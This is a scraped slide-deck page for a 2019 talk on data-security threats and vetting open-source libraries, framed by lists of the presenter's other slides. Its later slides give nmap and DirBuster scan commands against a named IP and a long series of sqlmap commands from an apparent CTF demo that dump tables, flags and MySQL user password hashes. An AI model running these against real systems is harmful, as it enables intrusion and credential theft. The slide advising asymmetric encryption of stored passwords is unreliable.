Security Testing ModernApps_v1.0
 
Software Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and SecuritySoftware Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and Security
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
PROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITYPROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITY
 
Security guidelines
Security guidelinesSecurity guidelines
Security guidelines
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
 

Mehr von Chetan Khatri

PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-AirflowPyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-AirflowChetan Khatri
 
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in productionScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in productionChetan Khatri
 
No more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in productionNo more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in productionChetan Khatri
 
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_productionPyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_productionChetan Khatri
 
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scalaAutomate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scalaChetan Khatri
 
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...Chetan Khatri
 
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...Chetan Khatri
 
An Introduction to Spark with Scala
An Introduction to Spark with ScalaAn Introduction to Spark with Scala
An Introduction to Spark with ScalaChetan Khatri
 
HBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoHBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoChetan Khatri
 
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...Chetan Khatri
 
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...Chetan Khatri
 
Fossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriFossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriChetan Khatri
 
Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Chetan Khatri
 
An Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningAn Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningChetan Khatri
 
Introduction to Computer Science
Introduction to Computer ScienceIntroduction to Computer Science
Introduction to Computer ScienceChetan Khatri
 
An introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteAn introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteChetan Khatri
 
Think machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanThink machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanChetan Khatri
 
A step towards machine learning at accionlabs
A step towards machine learning at accionlabsA step towards machine learning at accionlabs
A step towards machine learning at accionlabsChetan Khatri
 
Voltage measurement using arduino
Voltage measurement using arduinoVoltage measurement using arduino
Voltage measurement using arduinoChetan Khatri
 
Design & Building Smart Energy Meter
Design & Building Smart Energy MeterDesign & Building Smart Energy Meter
Design & Building Smart Energy MeterChetan Khatri
 

Mehr von Chetan Khatri (20)

PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-AirflowPyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
 
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in productionScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
 
No more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in productionNo more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in production
 
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_productionPyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
 
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scalaAutomate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
 
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
 
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
 
An Introduction to Spark with Scala
An Introduction to Spark with ScalaAn Introduction to Spark with Scala
An Introduction to Spark with Scala
 
HBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoHBase with Apache Spark POC Demo
HBase with Apache Spark POC Demo
 
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
 
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
 
Fossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriFossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatri
 
Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...
 
An Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningAn Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learning
 
Introduction to Computer Science
Introduction to Computer ScienceIntroduction to Computer Science
Introduction to Computer Science
 
An introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteAn introduction to Git with Atlassian Suite
An introduction to Git with Atlassian Suite
 
Think machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanThink machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetan
 
A step towards machine learning at accionlabs
A step towards machine learning at accionlabsA step towards machine learning at accionlabs
A step towards machine learning at accionlabs
 
Voltage measurement using arduino
Voltage measurement using arduinoVoltage measurement using arduino
Voltage measurement using arduino
 
Design & Building Smart Energy Meter
Design & Building Smart Energy MeterDesign & Building Smart Energy Meter
Design & Building Smart Energy Meter
 

Kürzlich hochgeladen

TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 

Kürzlich hochgeladen (20)

TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 

Demystify Data Security Threats & Open Source Risks

  • 1. Demystify Information Security & Threats for Data-Driven Platforms Chetan Khatri Solution Architect - Data & ML. Accionlabs Inc. 18th Oct, 2019
  • 2. Who Am I? Professional Career: ● 2016 - Present. - Technical Lead / Solution Architect - Data & ML. ● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice. ● 2014 - 2016 - Developer - Data Platforms. ● 2012 - 2014 - Consultant - Product developments. University: Master of Computer Science. Data Warehousing, Data Mining, Information Security / Cryptography, Reverse Engineering, Information Retrieval.
  • 3. Agenda ● Motivation ● Information Security - Ethics. ● Encryption ● Authentication ● Information Security & Potential threats with Open Source World. ● Find vulnerabilities. ● Checklist before using any Open Source library. ● Vulnerabilities report. ● Penetration Testing for Data Driven Developments.
  • 4. Information Security - Motivation Why Information Security is important?
  • 5. Information Security - Motivation Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-ac cessed-email-ids-phone-numbers-of-over-5-million-yatra-u sers_a_23475885/
  • 6. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
  • 7. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
  • 8. Information Security - Motivation Source: https://economictimes.indiatimes.com/smal l-biz/security-tech/security/zomato-hacked- security-breach-results-in-17-million-user-d ata-stolen/articleshow/58729251.cms
  • 9. Information Security - Motivation Source: https://www.forbes.com/sites/zakdoffman/2 019/07/09/warning-as-millions-of-zoom-us ers-risk-webcam-hijack-change-your-settin gs-now/#281cb40642d9
  • 14. Information Security - Ethics. ● Information Storage - What, Which form, Access to whom? ● Information Usage - Where, How, Which form? ● Responsibility - Ownership, usage? ● Confidentiality ● Authentication ● Governance - Regulators, Guidelines, Damage? ● Freedom vs Force ● Damage to the Society. ● Impact on humanity. ● Data Breach and Cost.
  • 18. Data Monetization against ethics Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns- about-cambridge-analytica-in-september-2015-per-court-filing/ Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analyti ca-facebook-influence-us-election
  • 19. Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack -password/
  • 20. Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Never ever store password of the application in Plain-text. Encrypt it. Use Asymmetric Key Encryption If RSA, use ssh-keygen -t rsa -b 4096
  • 21. Authentication Open IP Open Ports Default Username and Password for Database, Services etc. Chmod 777 for all directories, files ! Lol ;p
  • 22. Information Security & Potential threats with Open Source World.
  • 23. Information Security & Potential threats with Open Source World. How many of you use Open Source ?
  • 24. Security for Open Source world How well do you know what is inside your project?
  • 25. Security for Open Source world Known Good Development practices. Community Supported Open Source Code. v/s Random Code found on the Internet.
  • 26. Vulnerability in Open Source Source: https://synopsys.com/content/dam/synopsys/sig-assets/repo rts/2018-ossra.pdf
  • 27. How Do I Choose GOOD Open Source
  • 28. How do I choose SECURE open source packages?
  • 29. How do I choose SECURE open source packages? Have a look First look
  • 30. Key questions for a first look? ● Read the README.md or any other readily accessible introductory information? ● Does code seem to be held with good software development standards? ● Does this code develop for professional purposes or hobby projects? ● Any signs for known issues in the code? ● Does this code only solve one use case or is it robust enough for other use cases? ● Is this code active or an archive, “abandoned”? Look for warning signs...
  • 32. Even an author says - to use something else! Source: https://code.google.com/archive/p/c rypto-js/
  • 33. Build by an unauthorized person Source: https://metacpan.org/release/Tivoli- AccessManager-Admin
  • 34. I did not write this code, but I like it. Source: https://github.com/kbranigan/cJSON
  • 35. Not maintained anymore … Archived! Source: https://code.google.com/archive/p/crypto-js/
  • 36. Dumbest library - An author! Source: https://github.com/kbranigan/cJSON/commit/730 209a718cc9bada631cea136d13017752720f5
  • 37. It is slower and more subjective to side-channel attacks by nature. Source: http://www.literatecode.com/aes256
  • 38. What to watch before using any package/library?
  • 39. Key Questions for each Open Source Library Do only 1-2 Collaborators exist? Chances are more to have unreviewed, harmful code. Code merged to master branch is been reviewed with PR? How many issues are OPEN? Validate that OPEN issues are being addressed? Is that code maintained or abandon? Are issues getting fixed and released promptly?
  • 40. Key Questions for each Open Source Library Check recently active committers and commit? To understand how old is the project. Check how they handle vulnerabilities and security. How you can report security vulnerabilities? Check open security bugs/issues? Good example: Apache Community. https://www.apache.org/security/
  • 43. No known vulnerabilities doesn’t mean SECURITY! 1101 new vulnerabilities reported only in Oct, 2019. Source: https://nvd.nist.gov/vuln/full-l isting/2019/10
  • 44. Vulnerabilities report we are going far worse! Source: https://www.cvedetails.com/brows e-by-date.php
  • 46. Check number of OPEN services and ports sudo nmap -p- -sS -A IP-Address
  • 47. Server Files / Directories Scan on permission and Access java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337 httrack website copier
  • 48. Subgraph Vega ● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications. ● SQL Injection ● XSS ● Inadvertently disclosed sensitive information ● Reflected cross-site scripting ● Stored cross-site scripting ● Blind SQL injection ● Remote file include ● Shell injection ● TLS / SSL security settings
  • 49. Setup Proxy for Vega Tool
  • 50. Setup Proxy for Vega Tool
  • 51. Vega - Start the proxy!
  • 52. Vega - Start scanning Web application
  • 53. Vega - Start scanning Web application
  • 56. Web Application - Tracing web request payload at Proxy
  • 57. Web Application - Tracing web request payload at Proxy
  • 58. Web Application - Intercepting the response callback at Proxy
  • 59. SqlMap - A penetration testing tool for exploiting SQL injection flaws and a lot! ● Database fingerprinting. ● Full Support for SQL Injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. ● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack. ● dump database tables entirely. ● Out of Box Search support for Database names, Table names, Column names and values. ● Support to execute arbitrary commands and retrieve their standard output. ● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
  • 60. Demo - Penetration testing a Web Application using SQLMap
  • 61. Demo - Penetration testing a Web Application using SQLMap
  • 62. Demo - Penetration testing a Web Application using SQLMap
  • 63. Demo - Penetration testing a Web Application using SQLMap
  • 64. Demo - Penetration testing a Web Application using SQLMap
  • 65. Demo - Penetration testing a Web Application using SQLMap
  • 66. Demo - Penetration testing a Web Application using SQLMap
  • 67. Demo - Penetration testing a Web Application using SQLMap
  • 68. Demo - Penetration testing a Web Application using SQLMap
  • 69. SQLMap - Commands python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a 8709f33ac5
  • 71. Hope you had a fun!
  • 72. Thank you! Chetan Khatri, chetan.khatri@live.com @khatri_chetan - https://twitter.com/khatri_chetan https://github.com/chetkhatri